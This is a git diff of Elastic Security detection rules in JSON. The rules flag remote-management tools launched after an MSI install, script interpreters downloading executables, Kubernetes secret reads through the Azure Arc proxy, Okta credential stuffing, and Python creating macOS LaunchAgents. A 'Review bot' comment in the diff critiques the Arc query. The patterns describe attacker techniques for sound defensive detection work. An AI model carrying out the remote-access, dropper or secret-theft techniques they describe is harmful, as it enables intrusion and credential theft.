"Rule Type: Higher-Order Rule", - "Resources: Investigation Guide" - ], - "timestamp_override": "event.ingested", - "type": "esql", - "version": 1 - }, - "id": "1a3d5b36-b995-4ace-9b85-8a0af429ccf6_1", - "type": "security-rule" -} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/1b5e9d4a-7c2f-4e8b-a3d6-0f9c8e2b1a4d_1.json b/packages/security_detection_engine/kibana/security_rule/1b5e9d4a-7c2f-4e8b-a3d6-0f9c8e2b1a4d_1.json new file mode 100644 index 00000000000..077ec167d3e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1b5e9d4a-7c2f-4e8b-a3d6-0f9c8e2b1a4d_1.json 
@@ -0,0 +1,131 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects an MSI installer execution followed by the execution of commonly abused Remote Management Software like ScreenConnect. This behavior may indicate abuse where an attacker triggers an MSI install then connects via a guest link with a known session key.", + "from": "now-9m", + "index": [ + "endgame-*", + "logs-crowdstrike.fdr*", + "logs-endpoint.events.process-*", + "logs-m365_defender.event-*", + "logs-sentinel_one_cloud_funnel.*", + "logs-system.security*", + "logs-windows.sysmon_operational-*", + "winlogbeat-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote Management Access Launch After MSI Install", + "note": "## Triage and analysis\n\n### Investigating Remote Management Access Launch After MSI Install\n\nThis rule fires when the same host runs msiexec with an install argument (/i) and within one minute starts a pre-configured RMM software.\n\n### Possible investigation steps\n\n- Confirm the sequence on the host: first event should be msiexec.exe with process.args containing \"/i\"; second should be a remote management software.\n- Review the source of the MSI file using file events.\n- Check whether use of RMM software is approved for this host.\n- Check network events to validate which remote host the RMM software connects to.\n- Correlate with other alerts for the same host (initial access, persistence, C2).\n\n### False positive analysis\n\n- Legitimate IT/MSP deployment of RMM for support.\n\n### Response and remediation\n\n- If unauthorized RMM use or abuse is confirmed: isolate the host, terminate the ScreenConnect client, remove or block the installation, and investigate how the MSI was delivered and who operates the relay.\n", + "query": "sequence by host.id with maxspan=1m\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"msiexec.exe\" and process.args : (\"/i*\", \"-i*\")]\n 
[process where host.os.type == \"windows\" and event.type == \"start\" and\n (\n (process.name : \"ScreenConnect.ClientService.exe\" and process.command_line : \"*?e=Access&y=Guest&h*&k=*\") or\n (process.name : \"Syncro.Installer.exe\" and process.args : \"--config-json\" and process.args : \"--key\") or \n process.name : (\"tvnserver.exe\", \"winvnc.exe\") \n )\n ]\n", + "references": [ + "https://attack.mitre.org/techniques/T1219/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^3.0.0" + }, + { + "package": "sentinel_one_cloud_funnel", + "version": "^1.0.0" + }, + { + "package": "m365_defender", + "version": "^3.0.0" + }, + { + "package": "system", + "version": "^2.0.0" + }, + { + "package": "crowdstrike", + "version": "^3.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.command_line", + "type": "wildcard" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "1b5e9d4a-7c2f-4e8b-a3d6-0f9c8e2b1a4d", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon", + "Data Source: SentinelOne", + "Data Source: Microsoft Defender for Endpoint", + "Data Source: Crowdstrike", + "Data Source: Windows Security Event Logs", + "Data Source: Elastic Endgame" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1219", 
+ "name": "Remote Access Tools", + "reference": "https://attack.mitre.org/techniques/T1219/", + "subtechnique": [ + { + "id": "T1219.002", + "name": "Remote Desktop Software", + "reference": "https://attack.mitre.org/techniques/T1219/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 1 + }, + "id": "1b5e9d4a-7c2f-4e8b-a3d6-0f9c8e2b1a4d_1", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_214.json b/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_214.json new file mode 100644 index 00000000000..14f13a665ea --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/1d276579-3380-4095-ad38-e596a01bc64f_214.json 
@@ -0,0 +1,138 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies built-in Windows script interpreters (cscript.exe or wscript.exe) being used to download an executable file from a remote destination.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.network-*", + "logs-endpoint.events.file-*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote File Download via Script Interpreter", + "note": "## Triage and analysis\n\n### Investigating Remote File Download via Script Interpreter\n\nThe Windows Script Host (WSH) is a Windows automation technology, which is ideal for non-interactive scripting needs, such as logon scripting, administrative scripting, and machine automation.\n\nAttackers commonly use WSH scripts as their initial access method, acting like droppers for second stage payloads, but can also use them to download tools and utilities needed to accomplish their goals.\n\nThis rule looks for DLLs and executables downloaded using `cscript.exe` or `wscript.exe`.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze both the script and the executable involved using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result 
!= 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- The usage of these script engines by regular users is unlikely. In the case of authorized benign true positives (B-TPs), exceptions can be added.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n",
+ "query": "sequence by host.id, process.entity_id\n [network where host.os.type == \"windows\" and process.name : (\"wscript.exe\", \"cscript.exe\") and network.protocol != \"dns\" and\n network.direction : (\"outgoing\", \"egress\") and network.type == \"ipv4\" and destination.ip != \"127.0.0.1\"\n ]\n [file where host.os.type == \"windows\" and event.type == \"creation\" and\n file.extension : (\"exe\", \"dll\", \"bat\", \"cmd\", \"ps1\", \"vbs\", \"vbe\", \"js\", \"jse\", \"wsh\", \"wsf\", \"sct\", \"hta\", \"scr\", \"pif\", \"com\", \"cpl\")]\n",
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ },
+ {
+ "package": "windows",
+ "version": "^3.0.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "destination.ip",
+ "type": "ip"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "file.extension",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "network.direction",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "network.protocol",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "network.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.entity_id",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "1d276579-3380-4095-ad38-e596a01bc64f",
+ "severity": "medium",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Windows",
+ "Use Case: Threat Detection",
+ "Tactic: Command and Control",
+ "Tactic: Execution",
+ "Resources: Investigation Guide",
+ "Data Source: Elastic Defend",
+ "Data Source: Sysmon"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0011",
+ "name": "Command and Control",
+ "reference": "https://attack.mitre.org/tactics/TA0011/"
+ },
+ "technique": [
+ {
+ "id": "T1105",
+ "name": "Ingress Tool Transfer",
+ "reference": "https://attack.mitre.org/techniques/T1105/"
+ }
+ ]
+ },
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0002",
+ "name": "Execution",
+ "reference": "https://attack.mitre.org/tactics/TA0002/"
+ },
+ "technique": [
+ {
+ "id": "T1059",
+ "name": "Command and Scripting Interpreter",
+ "reference": "https://attack.mitre.org/techniques/T1059/",
+ "subtechnique": [
+ {
+ "id": "T1059.005",
+ "name": "Visual Basic",
+ "reference": "https://attack.mitre.org/techniques/T1059/005/"
+ }
+ ]
+ }
+ ]
+ }
+ ],
+ "type": "eql",
+ "version": 214
+ },
+ "id": "1d276579-3380-4095-ad38-e596a01bc64f_214",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/220d92c6-479d-4a49-9cc0-3a29756dad0c_1.json b/packages/security_detection_engine/kibana/security_rule/220d92c6-479d-4a49-9cc0-3a29756dad0c_1.json
new file mode 100644
index 00000000000..6ff380f951d
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/220d92c6-479d-4a49-9cc0-3a29756dad0c_1.json
@@ -0,0 +1,150 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Detects when secrets or configmaps are accessed, created, modified, or deleted in a Kubernetes cluster by the Azure Arc AAD proxy service account. When operations are routed through the Azure Arc Cluster Connect proxy, the Kubernetes audit log records the acting user as `system:serviceaccount:azure-arc:azure-arc-kube-aad-proxy-sa` with the actual caller identity in the `impersonatedUser` field. This pattern indicates that someone is accessing the cluster through the Azure ARM API rather than directly via kubectl against the API server. While legitimate for Arc-managed workflows, adversaries with stolen service principal credentials can abuse Arc Cluster Connect to read, exfiltrate, or modify secrets and configmaps while appearing as the Arc proxy service account in K8s audit logs.",
+ "false_positives": [
+ "Azure Arc system components may create or update secrets and configmaps in the azure-arc and azure-arc-release namespaces during normal cluster management. Filter by namespace to exclude these.",
+ "Helm operations managed through Arc may create release secrets (prefixed with sh.helm.release.v1). These are normal Arc lifecycle operations."
+ ],
+ "from": "now-5d",
+ "interval": "9m",
+ "language": "esql",
+ "license": "Elastic License v2",
+ "name": "Kubernetes Secret or ConfigMap Access via Azure Arc Proxy",
+ "note": "## Triage and analysis\n\n### Investigating Kubernetes Secret or ConfigMap Access via Azure Arc Proxy\n\nWhen Kubernetes operations are performed through Azure Arc Cluster Connect, the K8s audit log shows the Arc AAD proxy\nservice account as the authenticated user, with the actual Azure AD identity in the `impersonatedUser` field. This\nrule detects non-system secret and configmap access \u2014 including reads, writes, and deletions \u2014 routed through this\nproxy path. Read operations (`get`, `list`) are particularly important to detect as they represent the most common\nadversary action: exfiltrating secrets without leaving obvious modification traces.\n\n### Possible investigation steps\n\n- Check the `kubernetes.audit.impersonatedUser.username` field \u2014 this contains the Azure AD object ID of the actual\n caller. Cross-reference with Azure AD to identify the service principal or user.\n- Review the `kubernetes.audit.impersonatedUser.extra.oid` field for the Azure AD object ID.\n- Examine the namespace \u2014 operations in `default` or application namespaces are more suspicious than `azure-arc` or\n `kube-system`.\n- Check the `kubernetes.audit.objectRef.name` \u2014 look for suspicious secret/configmap names that don't match known\n application resources.\n- Correlate with Azure Activity Logs for the same time window to find the `LISTCLUSTERUSERCREDENTIAL` operation that\n initiated the Arc proxy session.\n- Review Azure Sign-In Logs for the impersonated identity's authentication source IP and geolocation.\n\n### Response and remediation\n\n- If the impersonated identity is not recognized, revoke its Azure AD credentials immediately.\n- Remove the ClusterRoleBinding or RoleBinding that grants the identity access to secrets/configmaps.\n- Rotate any Kubernetes secrets that may have been read or exfiltrated.\n- Review the Arc connection and consider disconnecting it if compromised.\n",
+ "query": "FROM logs-kubernetes.audit_logs-* metadata _id, _version, _index\n| WHERE STARTS_WITH(kubernetes.audit.user.username, \"system:serviceaccount:azure-arc:\")\n AND kubernetes.audit.objectRef.resource IN (\"secrets\", \"configmaps\")\n AND kubernetes.audit.verb IN (\"get\", \"list\", \"create\", \"update\", \"patch\", \"delete\")\n AND kubernetes.audit.objectRef.namespace NOT IN (\"azure-arc\", \"azure-arc-release\", \"kube-system\")\n AND NOT STARTS_WITH(kubernetes.audit.objectRef.name, \"sh.helm.release.v1\")\n\n| STATS\n Esql.verb_values = VALUES(kubernetes.audit.verb),\n Esql.resource_type_values = VALUES(kubernetes.audit.objectRef.resource),\n Esql.resource_name_values = VALUES(kubernetes.audit.objectRef.name),\n Esql.namespace_values = VALUES(kubernetes.audit.objectRef.namespace),\n Esql.acting_user_values = VALUES(kubernetes.audit.user.username),\n Esql.user_agent_values = VALUES(kubernetes.audit.userAgent),\n Esql.source_ips_values = VALUES(kubernetes.audit.sourceIPs),\n Esql.response_code_values = VALUES(kubernetes.audit.responseStatus.code),\n Esql.timestamp_first_seen = MIN(@timestamp),\n Esql.timestamp_last_seen = MAX(@timestamp),\n Esql.event_count = COUNT(*)\n BY kubernetes.audit.impersonatedUser.username\n\n| WHERE Esql.timestamp_first_seen >= NOW() - 9 minutes\n| KEEP *\n",
+ "references": [
+ "https://learn.microsoft.com/en-us/azure/azure-arc/kubernetes/cluster-connect",
+ "https://microsoft.github.io/Threat-Matrix-for-Kubernetes/",
+ "https://www.ibm.com/think/x-force/identifying-abusing-azure-arc-for-hybrid-escalation-persistence",
+ "https://cloud.google.com/blog/topics/threat-intelligence/escalating-privileges-azure-kubernetes-services",
+ "https://www.wiz.io/blog/lateral-movement-risks-in-the-cloud-and-how-to-prevent-them-part-3-from-compromis"
+ ],
+ "related_integrations": [
+ {
+ "package": "kubernetes",
+ "version": "^1.4.1"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": false,
+ "name": "Esql.acting_user_values",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "Esql.event_count",
+ "type": "long"
+ },
+ {
+ "ecs": false,
+ "name": "Esql.namespace_values",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "Esql.resource_name_values",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "Esql.resource_type_values",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "Esql.response_code_values",
+ "type": "integer"
+ },
+ {
+ "ecs": false,
+ "name": "Esql.source_ips_values",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "Esql.timestamp_first_seen",
+ "type": "date"
+ },
+ {
+ "ecs": false,
+ "name": "Esql.timestamp_last_seen",
+ "type": "date"
+ },
+ {
+ "ecs": false,
+ "name": "Esql.user_agent_values",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "Esql.verb_values",
+ "type": "keyword"
+ },
+ {
+ "ecs": false,
+ "name": "kubernetes.audit.impersonatedUser.username",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "220d92c6-479d-4a49-9cc0-3a29756dad0c",
+ "severity": "medium",
+ "tags": [
+ "Data Source: Kubernetes",
+ "Domain: Kubernetes",
+ "Domain: Cloud",
+ "Use Case: Threat Detection",
+ "Tactic: Credential Access",
+ "Tactic: Collection",
+ "Resources: Investigation Guide"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0006",
+ "name": "Credential Access",
+ "reference": "https://attack.mitre.org/tactics/TA0006/"
+ },
+ "technique": [
+ {
+ "id": "T1552",
+ "name": "Unsecured Credentials",
+ "reference": "https://attack.mitre.org/techniques/T1552/",
+ "subtechnique": [
+ {
+ "id": "T1552.007",
+ "name": "Container API",
+ "reference": "https://attack.mitre.org/techniques/T1552/007/"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0009",
+ "name": "Collection",
+ "reference": "https://attack.mitre.org/tactics/TA0009/"
+ },
+ "technique": [
+ {
+ "id": "T1530",
+ "name": "Data from Cloud Storage",
+ "reference": "https://attack.mitre.org/techniques/T1530/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "esql",
+ "version": 1
+ },
+ "id": "220d92c6-479d-4a49-9cc0-3a29756dad0c_1",
+ "type": "security-rule"
+}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/23f18264-2d6d-11ef-9413-f661ea17fbce_207.json b/packages/security_detection_engine/kibana/security_rule/23f18264-2d6d-11ef-9413-f661ea17fbce_207.json
deleted file mode 100644
index 9bd34a30522..00000000000
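Review bot: The STATS in the query groups BY `kubernetes.audit.impersonatedUser.username`, but nothing in the WHERE requires that field to be set, even though the description and the guide both hinge on the `impersonatedUser` value being present. The prefix match on `kubernetes.audit.user.username` also accepts any `azure-arc` service account, not just the `azure-arc-kube-aad-proxy-sa` account the description names, so audit events from Arc agents that carry no impersonation would, as I read ES|QL, collapse into a single null-keyed group and alert without an identity to pivot on. Adding `AND kubernetes.audit.impersonatedUser.username IS NOT NULL` to the WHERE aligns the query with the documented detection logic and with `required_fields`; if matching every `azure-arc` service account is intended, the description should say so instead. Separately, `Esql.response_code_values` is collected but never mentioned in the guide; a step such as `- Check Esql.response_code_values: a 403 means the request was denied by RBAC, a 2xx means the resource was actually returned or changed.` would tell an analyst whether any data was exposed.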
--- a/packages/security_detection_engine/kibana/security_rule/23f18264-2d6d-11ef-9413-f661ea17fbce_207.json
+++ /dev/null
@@ -1,84 +0,0 @@
-{
- "attributes": {
- "author": [
- "Elastic"
- ],
- "description": "Detects when an Okta client address has a certain threshold of Okta user authentication events with multiple device token hashes generated for single user authentication. Adversaries may attempt to launch a credential stuffing or password spraying attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts.",
- "false_positives": [
- "Users may share an endpoint related to work or personal use in which separate Okta accounts are used.",
- "Shared systems such as Kiosks and conference room computers may be used by multiple users."
- ],
- "from": "now-9m",
- "language": "esql",
- "license": "Elastic License v2",
- "name": "High Number of Okta Device Token Cookies Generated for Authentication",
- "note": "## Triage and analysis\n\n### Investigating High Number of Okta Device Token Cookies Generated for Authentication\n\nThis rule detects when a certain threshold of Okta user authentication events are reported for multiple users from the same client address. Adversaries may attempt to launch a credential stuffing attack from the same device by using a list of known usernames and passwords to gain unauthorized access to user accounts. 
Note that Okta does not log unrecognized usernames supplied during authentication attempts, so this rule may not detect all credential stuffing attempts or may indicate a targeted attack.\n\n#### Possible investigation steps:\n- Since this is an ESQL rule, the `okta.actor.alternate_id` and `okta.client.ip` values can be used to pivot into the raw authentication events related to this activity.\n- Identify the users involved in this action by examining the `okta.actor.id`, `okta.actor.type`, `okta.actor.alternate_id`, and `okta.actor.display_name` fields.\n- Determine the device client used for these actions by analyzing `okta.client.ip`, `okta.client.user_agent.raw_user_agent`, `okta.client.zone`, `okta.client.device`, and `okta.client.id` fields.\n- Review the `okta.security_context.is_proxy` field to determine if the device is a proxy.\n - If the device is a proxy, this may indicate that a user is using a proxy to access multiple accounts for password spraying.\n- With the list of `okta.actor.alternate_id` values, review `event.outcome` results to determine if the authentication was successful.\n - If the authentication was successful for any user, pivoting to `event.action` values for those users may provide additional context.\n- With Okta end users identified, review the `okta.debug_context.debug_data.dt_hash` field.\n - Historical analysis should indicate if this device token hash is commonly associated with the user.\n- Review the `okta.event_type` field to determine the type of authentication event that occurred.\n - If the event type is `user.authentication.sso`, the user may have legitimately started a session via a proxy for security or privacy reasons.\n - If the event type is `user.authentication.password`, the user may be using a proxy to access multiple accounts for password spraying.\n - If the event type is `user.session.start`, the source may have attempted to establish a session via the Okta authentication API.\n- Examine the 
`okta.outcome.result` field to determine if the authentication was successful.\n- Review the past activities of the actor(s) involved in this action by checking their previous actions.\n- Evaluate the actions that happened just before and after this event in the `okta.event_type` field to help understand the full context of the activity.\n - This may help determine the authentication and authorization actions that occurred between the user, Okta and application.\n\n### False positive analysis:\n- A user may have legitimately started a session via a proxy for security or privacy reasons.\n- Users may share an endpoint related to work or personal use in which separate Okta accounts are used.\n - Architecturally, this shared endpoint may leverage a proxy for security or privacy reasons.\n - Shared systems such as Kiosks and conference room computers may be used by multiple users.\n - Shared working spaces may have a single endpoint that is used by multiple users.\n\n### Response and remediation:\n- Review the profile of the users involved in this action to determine if proxy usage may be expected.\n- If the user is legitimate and the authentication behavior is not suspicious based on device analysis, no action is required.\n- If the user is legitimate but the authentication behavior is suspicious, consider resetting passwords for the users involves and enabling multi-factor authentication (MFA).\n - If MFA is already enabled, consider resetting MFA for the users.\n- If any of the users are not legitimate, consider deactivating the user's account.\n- Conduct a review of Okta policies and ensure they are in accordance with security best practices.\n- Check with internal IT teams to determine if the accounts involved recently had MFA reset at the request of the user.\n - If so, confirm with the user this was a legitimate request.\n - If so and this was not a legitimate request, consider deactivating the user's account temporarily.\n - Reset passwords and reset MFA for 
the user.\n- If this is a false positive, consider adding the `okta.debug_context.debug_data.dt_hash` field to the `exceptions` list in the rule.\n - This will prevent future occurrences of this event for this device from triggering the rule.\n - Alternatively adding `okta.client.ip` or a CIDR range to the `exceptions` list can prevent future occurrences of this event from triggering the rule.\n - This should be done with caution as it may prevent legitimate alerts from being generated.\n",
- "query": "from logs-okta*\n| where\n event.dataset == \"okta.system\" and\n (event.action like \"user.authentication.*\" or event.action == \"user.session.start\") and\n okta.debug_context.debug_data.request_uri == \"/api/v1/authn\" and\n okta.outcome.reason == \"INVALID_CREDENTIALS\"\n| keep\n event.action,\n okta.debug_context.debug_data.dt_hash,\n okta.client.ip,\n okta.actor.alternate_id,\n okta.debug_context.debug_data.request_uri,\n okta.outcome.reason\n| stats\n Esql.okta_debug_context_debug_data_dt_hash_count_distinct = count_distinct(okta.debug_context.debug_data.dt_hash)\n by\n okta.client.ip,\n okta.actor.alternate_id\n| where\n Esql.okta_debug_context_debug_data_dt_hash_count_distinct >= 30\n| sort\n Esql.okta_debug_context_debug_data_dt_hash_count_distinct desc\n",
- "references": [
- "https://support.okta.com/help/s/article/How-does-the-Device-Token-work?language=en_US",
- "https://developer.okta.com/docs/reference/api/event-types/",
- "https://www.elastic.co/security-labs/testing-okta-visibility-and-detection-dorothy",
- "https://sec.okta.com/articles/2023/08/cross-tenant-impersonation-prevention-and-detection",
- "https://www.okta.com/resources/whitepaper-how-adaptive-mfa-can-help-in-mitigating-brute-force-attacks/",
- "https://www.elastic.co/security-labs/monitoring-okta-threats-with-elastic-security",
- "https://www.elastic.co/security-labs/starter-guide-to-understanding-okta"
- ],
- "related_integrations": [
- {
- "package": "okta",
- "version": "^3.0.0"
- }
- ],
- "risk_score": 21,
- "rule_id": "23f18264-2d6d-11ef-9413-f661ea17fbce",
- "setup": "The Okta Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.",
- "severity": "low",
- "tags": [
- "Use Case: Identity and Access Audit",
- "Data Source: Okta",
- "Tactic: Credential Access",
- "Resources: Investigation Guide"
- ],
- "threat": [
- {
- "framework": "MITRE ATT&CK",
- "tactic": {
- "id": "TA0006",
- "name": "Credential Access",
- "reference": "https://attack.mitre.org/tactics/TA0006/"
- },
- "technique": [
- {
- "id": "T1110",
- "name": "Brute Force",
- "reference": "https://attack.mitre.org/techniques/T1110/",
- "subtechnique": [
- {
- "id": "T1110.003",
- "name": "Password Spraying",
- "reference": "https://attack.mitre.org/techniques/T1110/003/"
- }
- ]
- },
- {
- "id": "T1110",
- "name": "Brute Force",
- "reference": "https://attack.mitre.org/techniques/T1110/",
- "subtechnique": [
- {
- "id": "T1110.004",
- "name": "Credential Stuffing",
- "reference": "https://attack.mitre.org/techniques/T1110/004/"
- }
- ]
- }
- ]
- }
- ],
- "timestamp_override": "event.ingested",
- "type": "esql",
- "version": 207
- },
- "id": "23f18264-2d6d-11ef-9413-f661ea17fbce_207",
- "type": "security-rule"
-}
\ No newline at end of file
diff --git a/packages/security_detection_engine/kibana/security_rule/25368123-b7b8-4344-9fd4-df28051b4c6e_1.json b/packages/security_detection_engine/kibana/security_rule/25368123-b7b8-4344-9fd4-df28051b4c6e_1.json
new file mode 100644
index 00000000000..adb9b03fbfb
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/25368123-b7b8-4344-9fd4-df28051b4c6e_1.json
@@ -0,0 +1,90 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Detects the first time a Python process creates or modifies a LaunchAgent or LaunchDaemon plist file on a given host. Malicious Python scripts, compromised dependencies, or model file deserialization can establish persistence on macOS by writing plist files to LaunchAgent or LaunchDaemon directories. Legitimate Python processes do not typically create persistence mechanisms, so a first occurrence is a strong indicator of compromise.",
+ "from": "now-9m",
+ "history_window_start": "now-7d",
+ "index": [
+ "logs-endpoint.events.persistence-*"
+ ],
+ "language": "kuery",
+ "license": "Elastic License v2",
+ "name": "First Time Python Created a LaunchAgent or LaunchDaemon",
+ "new_terms_fields": [
+ "host.id",
+ "file.path"
+ ],
+ "note": "## Triage and analysis\n\n### Investigating First Time Python Created a LaunchAgent or LaunchDaemon\n\nmacOS LaunchAgents and LaunchDaemons are plist files that configure programs to run automatically at login or boot. Attackers who achieve Python code execution \u2014 whether through malicious scripts, compromised dependencies, or model file deserialization (e.g., pickle/PyTorch `__reduce__`) \u2014 can drop plist files to establish persistence on the compromised host. This ensures their payload survives reboots and user logouts.\n\nThis rule uses the Elastic Defend persistence event type (`event.action:\"launch_daemon\"`), which captures plist metadata including the program arguments, run-at-load configuration, and keep-alive settings. 
The New Terms rule type alerts on the first time a Python process creates a LaunchAgent or LaunchDaemon on a given host within a 7-day window.\n\n### Possible investigation steps\n\n- Review the persistence event fields (`Persistence.runatload`, `Persistence.keepalive`, `Persistence.args`, `Persistence.path`) to understand the plist configuration.\n- Examine the program path and arguments specified in the plist to determine if they reference a known legitimate application or a suspicious binary.\n- Determine if the Python process was loading a model file (look for `torch.load`, `pickle.load`), running a standalone script, or executing via a compromised dependency.\n- Verify if the target binary referenced in the plist exists on disk and whether it is signed or trusted.\n- Investigate the origin of any recently downloaded scripts, packages, or model files on the host.\n- Check for other persistence mechanisms that may have been established around the same time.\n\n### False positive analysis\n\n- Some Python-based system management tools (e.g., Ansible, SaltStack) may legitimately create LaunchAgent or LaunchDaemon plist files. Evaluate whether the activity matches a known automation workflow.\n- Python-based application installers may create plist files during setup. 
Check if the activity correlates with a known software installation.\n\n### Response and remediation\n\n- Immediately unload the suspicious LaunchAgent or LaunchDaemon using `launchctl unload` with the plist path.\n- Remove the suspicious plist file and any associated binary it references.\n- Kill any processes launched by the plist file.\n- Investigate and quarantine the Python script, package, or model file that created the persistence mechanism.\n- Scan the host for additional indicators of compromise.\n- If a malicious file is confirmed, identify all hosts where it may have been distributed.\n",
+ "query": "host.os.type:macos and event.action:\"launch_daemon\" and\nprocess.name:python*\n",
+ "references": [
